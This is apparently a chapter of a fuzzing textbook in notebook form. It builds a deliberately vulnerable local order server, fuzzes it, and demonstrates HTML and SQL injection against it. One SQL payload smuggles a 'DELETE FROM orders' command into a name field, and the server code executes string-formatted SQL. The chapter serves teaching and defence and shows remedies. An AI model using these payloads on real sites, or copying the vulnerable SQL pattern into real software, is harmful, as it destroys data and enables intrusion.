# Web and GUI Testing

In this chapter, we explore how to generate tests for Graphical User Interfaces (GUIs), notably Web interfaces.  We set up a (vulnerable) Web server and demonstrate how to systematically explore its behavior – first with hand-written grammars, then with grammars automatically inferred from the user interface.  We also show how to conduct systematic attacks on these servers, notably with code and SQL injection.

**Prerequisites**

* The techniques in this chapter make use of [grammars for fuzzing](Grammars.ipynb).
* Basic knowledge of HTML and HTTP is required.
* Knowledge of SQL databases is helpful.

## A Web User Interface

Let us start with a simple example.  We want to set up a _Web server_ that allows readers of this book to buy fuzzingbook-branded fan articles.  In reality, we would make use of an existing Web shop (or an appropriate framework) for this purpose.  For the purpose of this book, we _write our own Web server_, building on the HTTP server facilities provided by the Python library.

### Taking Orders

For our Web server, we need a number of Web pages:
* We want one page where customers can place an order.
* We want one page where they see their order confirmed.  
* Additionally, we need pages that display error messages such as "Page Not Found".

We start with the order form.  The dictionary `fuzzingbook_swag` holds the items that customers can order, together with long descriptions:

In [None]:
import fuzzingbook_utils

In [None]:
fuzzingbook_swag = {
    "tshirt": "One FuzzingBook T-Shirt",
    "drill": "One FuzzingBook Rotary Hammer",
    "lockset": "One FuzzingBook Lock Set"
}

This is the HTML code for the order form.  The menu for selecting the swag to be ordered is created dynamically from `fuzzingbook_swag`.  We omit plenty of details such as precise shipping address, payment, shopping cart, and more.

In [None]:
html_order_form = """
<html><body>
<form action="/order" style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
  <!-- We don't use h2, h3, etc. here as it interferes with notebook tocs -->
  <strong style="font-size: x-large">Fuzzingbook Swag Order Form</strong>
  <p>
  Yes! Please send me at your earliest convenience
  <select name="item">
  """

for item in fuzzingbook_swag:
    html_order_form += '<option value="{item}">{name}</option>'.format(item=item, 
        name=fuzzingbook_swag[item])

html_order_form += """
  </select>
  <br>
  <table>
  <tr><td>
  <label for="name">Name: </label><input type="text" name="name">
  </td><td>
  <label for="email">Email: </label><input type="email" name="email"><br>
  </td></tr>
  <tr><td>
  <label for="city">City: </label><input type="text" name="city">
  </td><td>
  <label for="zip">ZIP Code: </label><input type="number" name="zip">
  </td></tr>
  </table>
  <input type="checkbox" name="tandc"><label for="tandc">I have read 
  the <a href="/">terms and conditions</a></label><br>
  <button name="submit">Place order</button>
</p>
</form>
</body></html>
"""

This is what the order form looks like:

In [None]:
from IPython.display import HTML, display

In [None]:
HTML(html_order_form)

This form is not yet functional, as there is no server behind it; pressing "Place order" will lead you to a nonexistent page.

### Processing Orders

Once we have gotten an order, we show a confirmation page, which is instantiated with the customer information submitted before.  Here is the HTML and the rendering:

In [None]:
html_order_received = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
  <strong style="font-size: x-large">Thank you for your Fuzzingbook Order!</strong>
  <p>
  We will send <strong>{item_name}</strong> to {name} in {city}, {zip}<br>
  A confirmation mail will be sent to {email}.
  </p>
</div>
</body></html>
"""

In [None]:
HTML(html_order_received.format(item_name="One FuzzingBook Rotary Hammer", 
                                name="Jane Doe", 
                                email="doe@example.com",
                                city="Seattle",
                                zip="98104"))

### Storing Orders

To store orders, we make use of a *database*, stored in the file `orders.db`.

In [None]:
import sqlite3
import os

In [None]:
ORDERS_DB = "orders.db"

In [None]:
if os.path.exists(ORDERS_DB):
    os.remove(ORDERS_DB)

In [None]:
db_connection = sqlite3.connect(ORDERS_DB)

To interact with the database, we use *SQL commands*.  The following commands create a table with five text columns for item, name, email, city, and zip – the exact same fields we also use in our HTML form.

In [None]:
db_connection.execute("DROP TABLE IF EXISTS orders")
db_connection.execute("""
CREATE TABLE orders
(item text, name text, email text, city text, zip text)
""")
db_connection.commit()

At this point, the database is still empty:

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

We can add entries using the SQL `INSERT` command:

In [None]:
db_connection.execute("INSERT INTO orders " +
                      "VALUES ('lockset', 'Walter White', 'white@jpwynne.edu', 'Albuquerque', '87101')")
db_connection.commit()

These values are now in the database:

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

We can also delete entries from the table again (say, after completion of the order):

In [None]:
db_connection.execute("DELETE FROM orders WHERE name = 'Walter White'")
db_connection.commit()

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

### Handling HTTP Requests

We have an order form and a database; now we need a Web server which brings it all together.  The Python `http.server` module provides everything we need to build a simple HTTP server.  A `HTTPRequestHandler` is an object that takes and processes HTTP requests – in particular, `GET` requests for retrieving Web pages.

We implement the `do_GET()` method that, based on the given path, branches off to serve the requested Web pages.  Requesting the path `/` produces the order form; a path beginning with `/order` sends an order to be processed.  All other requests end in a `Page Not Found` message.

In [None]:
from http.server import HTTPServer, BaseHTTPRequestHandler, HTTPStatus

In [None]:
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # print("GET " + self.path)
        if self.path == "/":
            self.send_order_form()
        elif self.path.startswith("/order"):
            self.handle_order()
        else:
            self.not_found()

#### Order Form

Accessing the home page (i.e. getting the page at `/`) is simple: We go and serve the `html_order_form` as defined above.

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def send_order_form(self):
        self.send_response(HTTPStatus.OK, "Place your order")
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(html_order_form.encode("utf8"))

#### Processing Orders

When the user clicks the `Place order` button on the order form, the Web browser creates and retrieves a URL of the form

```
<hostname>/order?field_1=value_1&field_2=value_2&field_3=value_3
```

where each `field_i` is the name of the field in the HTML form, and `value_i` is the value provided by the user.  Values use the CGI encoding we have seen in the [chapter on coverage](Coverage.ipynb) – that is, spaces are converted into `+`, and characters that are not digits or letters are converted into `%nn`, where `nn` is the hexadecimal value of the character.

If Jane Doe <doe@example.com> from Seattle orders a T-shirt, this is the URL the browser creates:

```
<hostname>/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104
```
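
This encoding can be reproduced with the Python standard library.  As a minimal sketch, `urllib.parse.urlencode()` builds the same query string from a dictionary of field values; the dictionary `order` below is an illustrative stand-in for what the browser collects from the form.

```python
from urllib.parse import urlencode

# Illustrative field values, as a browser would collect them from the form
order = {
    "item": "tshirt",
    "name": "Jane Doe",
    "email": "doe@example.com",
    "city": "Seattle",
    "zip": "98104",
}

# urlencode() converts spaces into '+' and '@' into '%40'
path = "/order?" + urlencode(order)
print(path)
```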

When processing a query, the attribute `self.path` of the HTTP request handler holds the path accessed – i.e., everything after `<hostname>`.  The helper method `get_field_values()` takes `self.path` and returns a dictionary of values.

In [None]:
import urllib.parse

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def get_field_values(self):
        # Note: this fails to decode non-ASCII characters properly
        query_string = urllib.parse.urlparse(self.path).query
        
        # fields is { 'item': ['tshirt'], 'name': ['Jane Doe'], ...}
        fields = urllib.parse.parse_qs(query_string, keep_blank_values=True)

        values = {}
        for key in fields:
#             values[key] = urllib.parse.unquote(html.unescape(fields[key][0]))
            values[key] = fields[key][0]
        
        return values
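
To see what the two `urllib.parse` calls do, here is a small standalone sketch applied to a sample path.  The path and the variable names are illustrative.  Note how `keep_blank_values=True` preserves a field the user left empty (`city`), whereas a field that is absent from the URL (`zip`) does not show up at all.

```python
from urllib.parse import urlparse, parse_qs

# Illustrative path: 'city' is left blank, 'zip' is missing entirely
sample_path = "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city="

query_string = urlparse(sample_path).query
fields = parse_qs(query_string, keep_blank_values=True)

# Each field maps to a list of values; we keep the first one
sample_values = {key: fields[key][0] for key in fields}
print(sample_values)
```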

The method `handle_order()` takes these values from the URL, stores the order, and returns a page confirming the order.  If anything goes wrong, it sends an internal server error.

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def handle_order(self):
        try:
            values = self.get_field_values()
            self.store_order(values)
            self.send_order_received(values)
        except Exception:
            self.internal_server_error()

Storing the order makes use of the database connection defined above; we create a SQL command instantiated with the values as extracted from the URL.

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def store_order(self, values):
        sql_command = "INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)
        self.log_message("%s", sql_command)
        db_connection.executescript(sql_command)
        db_connection.commit()

After storing the order, we send the confirmation HTML page, which again is instantiated with the values from the URL.

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def send_order_received(self, values):
        values["item_name"] = fuzzingbook_swag[values["item"]]  # Should use html.escape()
        confirmation = html_order_received.format(**values).encode("utf8")

        self.send_response(HTTPStatus.OK, "Order received")
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(confirmation)

#### Other HTTP commands

Besides the `GET` command (which does all the heavy lifting), HTTP servers can also support other HTTP commands; we support the `HEAD` command, which returns the head information of a Web page.  In our case, this is always empty.

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def do_HEAD(self):
        # print("HEAD " + self.path)
        self.send_response(HTTPStatus.OK)
        self.send_header("Content-type", "text/html")
        self.end_headers()

### Error Handling

We have defined pages for submitting and processing orders; now we also need a few pages for errors that might occur.

#### Page Not Found

This page is displayed if a non-existing page (i.e. anything except `/` or `/order`) is requested.

In [None]:
html_not_found = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
  <strong style="font-size: x-large">Sorry.</strong>
  <p>
  This page does not exist.  Try our <a href="https://www.fuzzingbook.org/">homepage</a> instead.
  </p>
</div>
</body></html>
  """

In [None]:
HTML(html_not_found)

The method `not_found()` takes care of sending this out with the appropriate HTTP status code.

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def not_found(self):
        self.send_response(HTTPStatus.NOT_FOUND, "Not found")

        self.send_header("Content-type", "text/html")
        self.end_headers()

        message = html_not_found
        self.wfile.write(message.encode("utf8"))

#### Internal Errors

This page is shown for any internal errors that might occur.  For diagnostic purposes, we have it include the traceback of the failing function.

In [None]:
html_internal_server_error = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
  <strong style="font-size: x-large">Internal Server Error</strong>
  <p>
  The server has encountered an internal error.  Please come back later.
  <pre>{error_message}</pre>
  </p>
</div>
</body></html>
  """

In [None]:
HTML(html_internal_server_error)

In [None]:
import sys
import traceback

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def internal_server_error(self):
        self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR, "Internal Error")
        
        self.send_header("Content-type", "text/html")
        self.end_headers()

        exc = traceback.format_exc()
        self.log_message("%s", exc.strip())

        message = html_internal_server_error.format(error_message=exc)
        self.wfile.write(message.encode("utf8"))

### Logging

Our server runs as a separate process in the background, waiting to receive commands at all times.  To see what it is doing, we implement a special logging mechanism.  The `httpd_message_queue` establishes a queue into which one process (the server) can store Python objects, and from which another process (the notebook) can retrieve them.  We use this to pass log messages from the server, which we can then display in the notebook.

In [None]:
from multiprocessing import Queue

In [None]:
httpd_message_queue = Queue()

Let us place two messages in the queue:

In [None]:
httpd_message_queue.put("I am another message")

In [None]:
httpd_message_queue.put("I am one more message")

To distinguish server messages from other parts of the notebook, we format them specially:

In [None]:
def display_httpd_message(message):
    if fuzzingbook_utils.rich_output():
        display(HTML('<pre style="background: NavajoWhite; font-size: small">' + message + "</pre>"))
    else:
        print(message, end="")

In [None]:
display_httpd_message("I am a httpd server message")

The method `print_httpd_messages()` prints all messages accumulated in the queue so far:

In [None]:
def print_httpd_messages():
    while not httpd_message_queue.empty():
        message = httpd_message_queue.get()
        display_httpd_message(message)

In [None]:
import time

In [None]:
time.sleep(1)
print_httpd_messages()

The method `log_message()` in the request handler makes use of the queue to store its messages:

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def log_message(self, format, *args):
        message = ("%s - - [%s] %s\n" %
                         (self.address_string(),
                          self.log_date_time_string(),
                          format % args))
        httpd_message_queue.put(message)

In [the chapter on carving](Carver.ipynb), we introduced a `webbrowser()` function which retrieves the contents of the given URL.  We now extend it such that it also prints out any log messages produced by the server:

In [None]:
from Carver import webbrowser as simple_webbrowser

In [None]:
def webbrowser(url, mute=False):
    try:
        contents = simple_webbrowser(url)
    finally:
        if not mute:
            print_httpd_messages()
        else:
            # Clear queue silently
            while not httpd_message_queue.empty():
                httpd_message_queue.get()

    return contents

### Running the Server

After all these definitions, we are now ready to get the Web server up and running.  We run the server on the *local host* – that is, the same machine which also runs this notebook.  We check for an accessible port and put the resulting URL in the queue created earlier.

In [None]:
def run_httpd():
    host = "127.0.0.1"  # localhost IP
    for port in range(8800, 9000):
        httpd_address = (host, port)

        try:
            httpd = HTTPServer(httpd_address, SimpleHTTPRequestHandler)
            break
        except OSError:
            continue

    httpd_url = "http://" + host + ":" + repr(port)
    httpd_message_queue.put(httpd_url)
    httpd.serve_forever()

The server runs in a separate process, which we start using the `multiprocessing` module.

In [None]:
from multiprocessing import Process

In [None]:
httpd_process = Process(target=run_httpd)
httpd_process.start()

At this point, the Web server is running.  We retrieve its URL from the queue:

In [None]:
httpd_url = httpd_message_queue.get()
httpd_url

### Interacting with the Server

Let us now access the server just created.

#### Direct Browser Access

If you are running the Jupyter notebook server on the local host as well, you can now access the server directly at the given URL.  Simply click on the given address:

In [None]:
HTML('<pre><a href="' + httpd_url + '">' + httpd_url + "</a></pre>")

Even more convenient, you may be able to interact directly with the server using the window below.  (If you do not see a Web page, that's likely because you are using a remote notebook server; these typically do not allow access to self-defined services.)

In [None]:
HTML('<iframe src="' + httpd_url + '" ' + 'width="100%" height="230"/>')

After interaction, you can retrieve the messages produced by the server:

In [None]:
print_httpd_messages()

We can also see any orders placed in the database:

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

And we can clear the order database:

In [None]:
db_connection.execute("DELETE FROM orders")
db_connection.commit()

#### Retrieving the Home Page

Even if our browser cannot directly interact with the server, the _notebook_ can.  We can, for instance, retrieve the contents of the home page and display them:

In [None]:
contents = webbrowser(httpd_url)

In [None]:
HTML(contents)

#### Placing Orders

To test this form, we can generate URLs with orders and have the server process them.

The method `urljoin()` puts together a base URL (i.e., the URL of our server) and a path – say, the path towards our order.

In [None]:
from urllib.parse import urljoin

In [None]:
urljoin(httpd_url, "/order?foo=bar")

With `urljoin()`, we can create a full URL that is the same as the one generated by the browser as we submit the order form.  Sending this URL to the browser effectively places the order, as we can see in the server log produced:

In [None]:
time.sleep(2)

In [None]:
contents = webbrowser(urljoin(httpd_url, 
                "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))

The web page returned confirms the order:

In [None]:
HTML(contents)

And the order is in the database, too:

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

#### Error Messages

We can also test whether the server correctly responds to invalid requests.  Nonexistent pages, for instance, are correctly handled:

In [None]:
HTML(webbrowser(urljoin(httpd_url, "/some/other/path")))

You may remember we also have a page for internal server errors.  Can we get the server to produce this page?  To find this out, we have to test the server thoroughly – which we do in the remainder of this chapter.

## Fuzzing A Web Form

After setting up and starting the server, let us now go and systematically test it – first with expected, and then with less expected values.

### Fuzzing with Expected Values

Since placing orders is all done by creating appropriate URLs, we define a [grammar](Grammars.ipynb) `ORDER_GRAMMAR` which encodes ordering URLs.  It comes with a few sample values for names, email addresses, cities and (random) digits.

In [None]:
from Grammars import crange, is_valid_grammar

In [None]:
ORDER_GRAMMAR = {
    "<start>": [ "<order>" ],
    "<order>": [ "/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>" ],
    "<item>": [ "tshirt", "drill", "lockset" ],
    "<name>": [ "Jane+Doe", "John+Smith" ],
    "<email>": [ "j.doe%40example.com", "j_smith%40example.com"],
    "<city>": [ "Seattle", "New+York"],
    "<zip>": [ "<digit>" * 5 ],
    "<digit>": crange('0', '9')
}

In [None]:
assert is_valid_grammar(ORDER_GRAMMAR)

Using [one of our grammar fuzzers](GrammarFuzzer.ipynb), we can instantiate this grammar and generate URLs:

In [None]:
from GrammarFuzzer import GrammarFuzzer

In [None]:
order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR)
[order_fuzzer.fuzz() for i in range(5)]
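
To illustrate how such a grammar turns into URLs, here is a minimal standalone expander.  It is a sketch only and not the `GrammarFuzzer` class: it assumes a non-recursive grammar, and the names `ORDER_GRAMMAR_SKETCH` and `expand()` are made up for this example.

```python
import random
import re

# Same rules as ORDER_GRAMMAR, written out without the crange() helper
ORDER_GRAMMAR_SKETCH = {
    "<start>": ["<order>"],
    "<order>": ["/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>"],
    "<item>": ["tshirt", "drill", "lockset"],
    "<name>": ["Jane+Doe", "John+Smith"],
    "<email>": ["j.doe%40example.com", "j_smith%40example.com"],
    "<city>": ["Seattle", "New+York"],
    "<zip>": ["<digit>" * 5],
    "<digit>": list("0123456789"),
}

NONTERMINAL = re.compile(r"<[^<> ]+>")

def expand(grammar, symbol="<start>"):
    """Pick a random expansion for `symbol`, then expand its nonterminals."""
    expansion = random.choice(grammar[symbol])
    return NONTERMINAL.sub(lambda match: expand(grammar, match.group(0)), expansion)

print(expand(ORDER_GRAMMAR_SKETCH))
```

Every string produced this way is a syntactically valid order URL, which is why the server processes it without complaint.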

Sending these URLs to the server will have them processed correctly:

In [None]:
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

### Fuzzing with Unexpected Values

We can now see that the server does a good job when faced with "standard" values.  But what happens if we feed it non-standard values?  To this end, we make use of a [mutation fuzzer](MutationFuzzer.ipynb) which inserts random changes into the URL.  Our seed (i.e. the value to be mutated) comes from the grammar fuzzer:

In [None]:
seed = order_fuzzer.fuzz()
seed

Mutating this string yields mutations not only in the field values, but also in field names as well as the URL structure.

In [None]:
from MutationFuzzer import MutationFuzzer

In [None]:
mutate_order_fuzzer = MutationFuzzer([seed], min_mutations=1, max_mutations=1)
[mutate_order_fuzzer.fuzz() for i in range(5)]

Let us fuzz a little until we get an internal server error.  We use the Python `requests` module to interact with the Web server such that we can directly access the HTTP status code.

In [None]:
import requests

In [None]:
while True:
    path = mutate_order_fuzzer.fuzz()
    url = urljoin(httpd_url, path)
    r = requests.get(url)
    if r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
        break

That didn't take long.  Here's the offending URL:

In [None]:
url

In [None]:
HTML(webbrowser(url))

How does the URL cause this internal error?  We make use of [delta debugging](Reducer.ipynb) to minimize the failure-inducing path, setting up a `WebRunner` class to define the failure condition:

In [None]:
failing_path = path
failing_path

In [None]:
from Fuzzer import Runner

In [None]:
class WebRunner(Runner):
    def run(self, path):
        url = urljoin(httpd_url, path)
        r = requests.get(url)
        if r.status_code == HTTPStatus.OK:
            return path, Runner.PASS
        elif r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
            return path, Runner.FAIL
        else:
            return path, Runner.UNRESOLVED

In [None]:
web_runner = WebRunner()
web_runner.run(failing_path)

This is the minimized path:

In [None]:
from Reducer import DeltaDebuggingReducer

In [None]:
minimized_path = DeltaDebuggingReducer(web_runner).reduce(failing_path)
minimized_path
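
The idea behind the reduction can be sketched without a running server.  The code below is a simplified delta debugging loop, not the `DeltaDebuggingReducer` class itself.  The predicate `causes_server_error()` is a hypothetical stand-in for the server that only models missing fields, and the sample path is made up.

```python
from urllib.parse import urlparse, parse_qs

REQUIRED_FIELDS = ["item", "name", "email", "city", "zip"]

def causes_server_error(path):
    """Simplified stand-in for the server: an order with a missing field fails."""
    if not path.startswith("/order"):
        return False  # the real server would answer "Not found" instead
    fields = parse_qs(urlparse(path).query, keep_blank_values=True)
    return any(field not in fields for field in REQUIRED_FIELDS)

def ddmin(inp, fails):
    """Reduce `inp` to a shorter input for which `fails` still holds."""
    assert fails(inp)
    n = 2  # number of chunks the input is split into
    while len(inp) >= 2:
        start = 0.0
        subset_length = len(inp) / n
        reduced = False
        while start < len(inp):
            # Remove one chunk and test what remains
            complement = inp[:int(start)] + inp[int(start + subset_length):]
            if fails(complement):
                inp = complement
                n = max(n - 1, 2)
                reduced = True
                break
            start += subset_length
        if not reduced:
            if n == len(inp):
                break  # removing any single character makes the failure vanish
            n = min(n * 2, len(inp))
    return inp

# A mutated path in which the field name "zip" was damaged
failing_path_sketch = "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zp=98104"
print(ddmin(failing_path_sketch, causes_server_error))
```

Under these assumptions, everything after `/order` is irrelevant for the failure, so the reduction strips it away.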

It turns out that our server encounters an internal error if we do not supply the requested fields:

In [None]:
minimized_url = urljoin(httpd_url, minimized_path)
minimized_url

In [None]:
while not httpd_message_queue.empty():
    httpd_message_queue.get()

HTML(webbrowser(minimized_url))

We see that we might have a lot to do to make our Web Server more robust against unexpected inputs.  The [exercises](#Exercises) give some instructions on what to do.
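
The root cause is easy to reproduce in isolation: formatting the SQL template with an incomplete dictionary raises a `KeyError`.  The following sketch shows this, together with one possible check a more robust server could run first.  The helper `missing_fields()` and the constant `REQUIRED_FIELDS` are hypothetical names, not part of the server above.

```python
REQUIRED_FIELDS = ["item", "name", "email", "city", "zip"]
SQL_TEMPLATE = "INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')"

def missing_fields(values):
    """Return the required fields that are absent from `values`."""
    return [field for field in REQUIRED_FIELDS if field not in values]

incomplete_order = {"item": "tshirt", "name": "Jane Doe"}

try:
    SQL_TEMPLATE.format(**incomplete_order)
except KeyError as exc:
    print("Formatting failed; missing field:", exc)

# A server could check this up front and ask the user for the missing data
print(missing_fields(incomplete_order))
```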

## Crafting Web Attacks

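Random mutations are one way to stress the server.  More interesting, though, are values that are far less common than these: values crafted specifically to attack it.  To embed such values in a URL, we need the CGI encoding described above.  The function `cgi_encode()` produces it; it is the counterpart of `cgi_decode()` from the [chapter on coverage](Coverage.ipynb):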

In [None]:
import string

In [None]:
def cgi_encode(s):
    ret = ""
    for c in s:
        if c in string.ascii_letters or c in string.digits:
            ret += c
        elif c == ' ':
            ret += '+'
        else:
            ret += "%%%02x" % ord(c)
    return ret

In [None]:
s = cgi_encode("'DOW50' is down .24%")
s

In [None]:
from Coverage import cgi_decode

In [None]:
cgi_decode(s)

### Injecting Code

In [None]:
from Grammars import extend_grammar

In [None]:
ORDER_GRAMMAR_WITH_HTML_INJECTION = extend_grammar(ORDER_GRAMMAR, {
    "<name>": [ cgi_encode('''
    Jane Doe<p>
    <strong><a href="www.lots.of.malware">Click here for cute cat pictures!</a></strong>
    </p>
    ''')],
})

In [None]:
html_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_HTML_INJECTION)
order_with_injected_html = html_injection_fuzzer.fuzz()
order_with_injected_html

In [None]:
HTML(webbrowser(urljoin(httpd_url, order_with_injected_html)))

Note how the injected HTML appears in the log as well as in the HTML page produced.

By inserting arbitrary HTML content, we can easily destroy the reputation of an organization – for instance, by having the site display porn pictures.

Instead of injecting HTML, as in this example, we could also insert JavaScript code that would then automatically be executed as soon as the page is displayed.  This could be used to steal session IDs from the customer, such that others could keep on shopping without having to supply credentials.  It could also become active on Web pages used at the vendor's site, where it could be set to retrieve credentials or other means to access the entire customer database.

The remedy is: Sanitize all inputs.
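
For HTML output, one common way to do this is to escape user-supplied text before placing it into a page.  The sketch below uses `html.escape()` from the standard library on a shortened variant of the injected name; the variable names are illustrative.

```python
import html

injected_name = 'Jane Doe<p><strong><a href="www.lots.of.malware">Click here</a></strong></p>'

# Escaping turns markup characters into harmless character references
safe_name = html.escape(injected_name)
print(safe_name)
```

A browser displays the escaped text literally instead of interpreting it as markup.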

### Injecting SQL Commands

In [None]:
from Grammars import extend_grammar

In [None]:
ORDER_GRAMMAR_WITH_SQL_INJECTION = extend_grammar(ORDER_GRAMMAR, {
    "<name>": [ cgi_encode("Jane', 'x', 'x', 'x'); DELETE FROM orders; --")],
})

In [None]:
sql_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_SQL_INJECTION)
order_with_injected_sql = sql_injection_fuzzer.fuzz()
order_with_injected_sql

These are the current orders:

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

In [None]:
contents = webbrowser(urljoin(httpd_url, order_with_injected_sql))

All orders are now gone:

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())
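
To see why this works, it helps to look at the SQL command the server assembles.  The following sketch replays the string substitution from `store_order()` on a throwaway in-memory database; the name `demo_db` and the pre-existing order are made up for this example.

```python
import sqlite3

SQL_TEMPLATE = "INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')"

values = {
    "item": "tshirt",
    "name": "Jane', 'x', 'x', 'x'); DELETE FROM orders; --",
    "email": "j.doe@example.com",
    "city": "Seattle",
    "zip": "12345",
}

# The injected name closes the INSERT early and appends a second command;
# the trailing '--' turns the rest of the template into a comment
sql_command = SQL_TEMPLATE.format(**values)
print(sql_command)

# Replay the command against a throwaway in-memory database
demo_db = sqlite3.connect(":memory:")
demo_db.execute("CREATE TABLE orders (item text, name text, email text, city text, zip text)")
demo_db.execute("INSERT INTO orders VALUES ('drill', 'John Smith', 'j_smith@example.com', 'New York', '10001')")
demo_db.commit()

demo_db.executescript(sql_command)
remaining = demo_db.execute("SELECT * FROM orders").fetchall()
print(remaining)
```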

![https://xkcd.com/327/](https://imgs.xkcd.com/comics/exploits_of_a_mom.png)

Even if we had not been able to execute arbitrary commands, being able to compromise an orders database offers several possibilities for mischief.  For instance, we could use the address and matching credit card number of an existing person to go through validation and submit an order, only to have the order then delivered to an address of our choice.

Again, the remedy is to sanitize all inputs.
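
For SQL, a widely used alternative to sanitizing strings by hand is to keep data and command separate by means of query parameters.  The sketch below is one possible variant of `store_order()`, not the version used by our server; the names `store_order_safely()` and `demo_db` are hypothetical.

```python
import sqlite3

demo_db = sqlite3.connect(":memory:")
demo_db.execute("CREATE TABLE orders (item text, name text, email text, city text, zip text)")

def store_order_safely(connection, values):
    # '?' placeholders make sqlite3 treat every value as data, never as SQL
    connection.execute(
        "INSERT INTO orders VALUES (?, ?, ?, ?, ?)",
        (values["item"], values["name"], values["email"], values["city"], values["zip"]),
    )
    connection.commit()

malicious_order = {
    "item": "tshirt",
    "name": "Jane', 'x', 'x', 'x'); DELETE FROM orders; --",
    "email": "j.doe@example.com",
    "city": "Seattle",
    "zip": "12345",
}
store_order_safely(demo_db, malicious_order)

# The attack string ends up as an (odd-looking) customer name
stored_names = demo_db.execute("SELECT name FROM orders").fetchall()
print(stored_names)
```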

### Getting Information

To craft the above SQL queries, we have used insider information – for instance, we knew the name of the table as well as its structure.  Surely, an attacker would not know this and thus not be able to run the attack, right?  Unfortunately, it turns out we are leaking all of this information out to the world in the first place.  The error message produced by our server reveals everything we need:

In [None]:
from ExpectError import ExpectError

with ExpectError():
    answer = webbrowser(urljoin(httpd_url, "/order"))

In [None]:
HTML(answer)

The best way to avoid information leakage through failures is not to fail in the first place; your application should be robust against all sorts of inputs.

If you fail, make it hard for the attacker to establish a link between the attack and the failure. In the above case, the application could simply go back to the home page and ask the user to supply correct data.

## Extracting Grammars for Testing and Attacking Web Pages

### Searching HTML for Input Fields

In [None]:
html_doc = webbrowser(httpd_url)
html_doc

We could define a grammar to parse HTML, but it is much easier to use the existing, dedicated parser:

In [None]:
from html.parser import HTMLParser

In [None]:
class FormHTMLParser(HTMLParser):
    def reset(self):
        super().reset()
        self.fields = {}
        self.action = ""
        self.select = []

    def handle_starttag(self, tag, attrs):
        attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
        # print(tag, attributes)

        if tag == "form":
            self.action = attributes.get("action", "")
            
        elif tag == "select" or tag == "datalist":
            if "name" in attributes:
                name = attributes["name"]
                self.fields[name] = []
                self.select.append(name)
            else:
                self.select.append(None)

        elif tag == "option":
            current_select_name = self.select[-1]
            if current_select_name is not None and "value" in attributes:
                self.fields[current_select_name].append(attributes["value"])

        elif tag == "input":
            if "name" in attributes:
                name = attributes["name"]
                self.fields[name] = attributes.get("type", "text")
                
        elif tag == "button":
            if "name" in attributes:
                name = attributes["name"]
                self.fields[name] = [""]

    def handle_endtag(self, tag):
        if tag == "select":
            self.select.pop()

\todo{Handle `multiple` options, `textarea`}
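
The mechanism behind `FormHTMLParser` is easier to see in a stripped-down form.  The following sketch handles `<input>` tags only; the class `InputNameParser` and the sample form are made up for illustration.

```python
from html.parser import HTMLParser

class InputNameParser(HTMLParser):
    """Hypothetical minimal parser: collects name and type of <input> tags."""

    def __init__(self):
        super().__init__()
        self.inputs = {}

    def handle_starttag(self, tag, attrs):
        # attrs is a list of (name, value) pairs
        attributes = dict(attrs)
        if tag == "input" and "name" in attributes:
            # An <input> without explicit type is a text field
            self.inputs[attributes["name"]] = attributes.get("type", "text")

sample_form = """
<form action="/order">
  <input type="text" name="name">
  <input type="email" name="email">
  <input name="city">
</form>
"""

parser = InputNameParser()
parser.feed(sample_form)
print(parser.inputs)
```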

In [None]:
class HTMLGrammarMiner(object):
    def __init__(self, html_doc):
        html_parser = FormHTMLParser()
        html_parser.feed(html_doc)
        self.fields = html_parser.fields
        self.action = html_parser.action

In [None]:
html_miner = HTMLGrammarMiner(html_doc)
html_miner.action

In [None]:
html_miner.fields

### Mining Grammars for Web Pages

In [None]:
from Grammars import crange, srange, new_symbol, unreachable_nonterminals, CGI_GRAMMAR

In [None]:
class HTMLGrammarMiner(HTMLGrammarMiner):
    QUERY_GRAMMAR = extend_grammar(CGI_GRAMMAR, {
        "<start>": ["<action>?<query>"],

        "<text>": ["<string>"],

        "<number>": ["<digits>"],
        "<digits>": ["<digit>", "<digits><digit>"],
        "<digit>": crange('0', '9'),

        "<checkbox>": ["<_checkbox>"],
        "<_checkbox>": ["on", "off"],
